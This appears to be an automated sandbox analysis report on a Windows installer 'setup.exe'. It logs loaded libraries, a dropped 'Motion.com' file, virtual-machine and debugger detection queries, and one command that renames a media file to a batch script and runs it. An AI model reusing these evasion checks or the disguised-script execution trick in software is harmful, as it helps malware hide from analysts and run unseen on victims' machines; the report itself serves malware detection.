Source: C:\Users\user\Desktop\setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: setup.exe

Static file information: File size 1259091 > 1048576

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_00405B93 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405B93

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\826825\Motion.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\826825\Motion.com

Jump to dropped file

Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com TID: 7532

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\setup.exe	Code function: 0_2_00405B6C FindFirstFileW,FindClose,		0_2_00405B6C
Source: C:\Users\user\Desktop\setup.exe	Code function: 0_2_0040652D DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		0_2_0040652D

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\826825	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\826825\	Jump to behavior

Source: Amcache.hve.24.dr	Binary or memory string: VMware
Source: Amcache.hve.24.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.24.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.24.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.24.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.24.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.24.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.24.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.24.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.24.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.24.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.24.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.24.dr	Binary or memory string: VMware Virtual RAMX
Source: Amcache.hve.24.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.24.dr	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dd-92 e8 86 9f a5 a6 64 93
Source: Amcache.hve.24.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.24.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.24.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.24.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.24.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.24.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.24.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.24.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.24.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.24.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.24.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.24.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.24.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.24224532.B64.2408191502,BiosReleaseDate:08/19/2024,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.24.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_00405B93 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405B93

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
